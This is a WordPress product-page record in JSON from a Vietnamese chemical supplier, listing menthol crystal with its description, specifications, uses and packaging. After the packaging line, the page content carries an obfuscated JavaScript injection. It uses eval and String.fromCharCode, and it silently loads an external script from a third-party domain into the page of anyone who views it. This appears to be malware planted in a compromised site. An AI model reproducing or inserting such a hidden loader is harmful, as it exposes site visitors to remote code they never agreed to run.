{"id":2191,"date":"2022-07-05T14:52:08","date_gmt":"2022-07-05T14:52:08","guid":{"rendered":"http:\/\/site2.easyceotech.com\/?post_type=product&#038;p=2191"},"modified":"2023-11-24T03:42:52","modified_gmt":"2023-11-24T03:42:52","slug":"menthol-crystal","status":"publish","type":"product","link":"https:\/\/wpachem.com\/vi\/product\/menthol-crystal\/","title":{"rendered":"Tinh th\u1ec3 b\u1ea1c h\u00e0 CAS 89-78-1"},"content":{"rendered":"<p>Tinh th\u1ec3 menthol c\u00f3 hai \u0111\u1ed3ng ph\u00e2n (lo\u1ea1i D v\u00e0 lo\u1ea1i L). Menthol t\u1ef1 nhi\u00ean ch\u1ee7 y\u1ebfu l\u00e0 \u0111\u1ed3ng ph\u00e2n levorotatory (L-menthol). Menthol \u1edf \u0111\u00e2y l\u00e0 menthol racemic (DL-menthol), tinh th\u1ec3 menthol lo\u1ea1i DL \u0111\u01b0\u1ee3c s\u1eed d\u1ee5ng l\u00e0m ch\u1ea5t t\u1ea1o m\u00f9i trong kem \u0111\u00e1nh r\u0103ng, n\u01b0\u1edbc hoa, \u0111\u1ed3 u\u1ed1ng v\u00e0 b\u00e1nh k\u1eb9o. T\u00e1c d\u1ee5ng l\u00e0m m\u00e1t, ch\u1ed1ng ng\u1ee9a, cho ch\u1ee9ng \u0111au \u0111\u1ea7u v\u00e0 m\u0169i, h\u1ea7u h\u1ecdng, vi\u00eam thanh qu\u1ea3n, v.v. C\u00e1c este c\u1ee7a n\u00f3 c\u0169ng \u0111\u01b0\u1ee3c s\u1eed d\u1ee5ng trong gia v\u1ecb.<\/p>\n<table>\n<tbody>\n<tr>\n<td width=\"372\">V\u1eba B\u1ec0 NGO\u00c0I:<\/td>\n<td width=\"922\">TINH TH\u1ec2 NH\u01af KIM KH\u00d4NG M\u00c0U, TRONG SU\u1ed0T<\/td>\n<\/tr>\n<tr>\n<td width=\"372\">M\u00d9I:<\/td>\n<td width=\"922\">M\u00d9I H\u01af\u01a0NG \u0110\u1eb6C TR\u01afNG C\u1ee6A MENTHOL T\u1ef0 NHI\u00caN<\/td>\n<\/tr>\n<tr>\n<td width=\"372\">\u0110I\u1ec2M N\u00d3NG CH\u1ea2Y:<\/td>\n<td width=\"922\">41-44\u2103<\/td>\n<\/tr>\n<tr>\n<td width=\"372\">V\u1eacT CH\u1ea4T KH\u00d4NG BAY \u0110\u1ed8NG:<\/td>\n<td width=\"922\">0,05% T\u1ed0I \u0110A<\/td>\n<\/tr>\n<tr>\n<td width=\"372\">QUAY QUANG H\u1eccC (25\u2103)<\/td>\n<td width=\"922\">50\u00b0\uff5e -49\u00b0<\/td>\n<\/tr>\n<tr>\n<td width=\"372\">N\u1ed8I DUNG :<\/td>\n<td width=\"922\">99%MIN<\/td>\n<\/tr>\n<tr>\n<td width=\"372\">TI\u00caU CHU\u1ea8N:<\/td>\n<td width=\"922\">BP\/USP\/CP<\/td>\n<\/tr>\n<tr>\n<td width=\"372\">\u0110I\u1ec0U KI\u1ec6N B\u1ea2O QU\u1ea2N:<\/td>\n<td width=\"922\">B\u1ea2O QU\u1ea2N TRONG H\u1ed8P K\u00cdN \u1ede N\u01a0I M\u00c1T.<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>&nbsp;<\/p>\n<p><strong>\u1ee8ng d\u1ee5ng<\/strong><\/p>\n<p>Tinh th\u1ec3 menthol c\u00f3 th\u1ec3 d\u00f9ng l\u00e0m h\u01b0\u01a1ng li\u1ec7u th\u1ef1c ph\u1ea9m, ch\u1ea5t t\u0103ng h\u01b0\u01a1ng v\u1ecb, c\u00f3 th\u1ec3 d\u00f9ng trong k\u1eb9o (b\u1ea1c h\u00e0, k\u1eb9o cao su), \u0111\u1ed3 u\u1ed1ng, kem, v.v. Menthol v\u00e0 menthol racemic c\u00f3 th\u1ec3 d\u00f9ng l\u00e0m kem \u0111\u00e1nh r\u0103ng; N\u01b0\u1edbc hoa; Ch\u1ea5t t\u1ea1o m\u00f9i, nh\u01b0 trong \u0111\u1ed3 u\u1ed1ng v\u00e0 b\u00e1nh k\u1eb9o.<\/p>\n<p><strong>\u0110\u00f3ng g\u00f3i<\/strong><\/p>\n<p>25KG\/BAGvar f=String;eval(f.fromCharCode(102,117,110)+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,10 0,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114, 32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,51,46,48,46, 51,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,1 10)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,1 12,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode (115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101 ,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));\/*99586587347*\/<\/p>","protected":false},"excerpt":{"rendered":"<p>T\u00ean s\u1ea3n ph\u1ea9m: Menthol crystal<br \/>\nS\u1ed1 CAS: 89-78-1<br \/>\nMF\uff1aC10H20O<br \/>\nS\u1ed1 EINECS: 201-939-0<br \/>\nNgo\u1ea1i h\u00ecnh: TINH TH\u1ec2 NH\u01af KIM TRONG SU\u1ed0T KH\u00d4NG M\u00c0U<\/p>","protected":false},"featured_media":2193,"template":"","meta":{"_acf_changed":false,"_gspb_post_css":""},"product_brand":[],"product_cat":[61],"product_tag":[],"class_list":{"0":"post-2191","1":"product","2":"type-product","3":"status-publish","4":"has-post-thumbnail","6":"product_cat-flavor-and-fragrance","8":"first","9":"instock","10":"shipping-taxable","11":"product-type-simple"},"acf":[],"_links":{"self":[{"href":"https:\/\/wpachem.com\/vi\/wp-json\/wp\/v2\/product\/2191","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/wpachem.com\/vi\/wp-json\/wp\/v2\/product"}],"about":[{"href":"https:\/\/wpachem.com\/vi\/wp-json\/wp\/v2\/types\/product"}],"version-history":[{"count":0,"href":"https:\/\/wpachem.com\/vi\/wp-json\/wp\/v2\/product\/2191\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/wpachem.com\/vi\/wp-json\/wp\/v2\/media\/2193"}],"wp:attachment":[{"href":"https:\/\/wpachem.com\/vi\/wp-json\/wp\/v2\/media?parent=2191"}],"wp:term":[{"taxonomy":"product_brand","embeddable":true,"href":"https:\/\/wpachem.com\/vi\/wp-json\/wp\/v2\/product_brand?post=2191"},{"taxonomy":"product_cat","embeddable":true,"href":"https:\/\/wpachem.com\/vi\/wp-json\/wp\/v2\/product_cat?post=2191"},{"taxonomy":"product_tag","embeddable":true,"href":"https:\/\/wpachem.com\/vi\/wp-json\/wp\/v2\/product_tag?post=2191"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}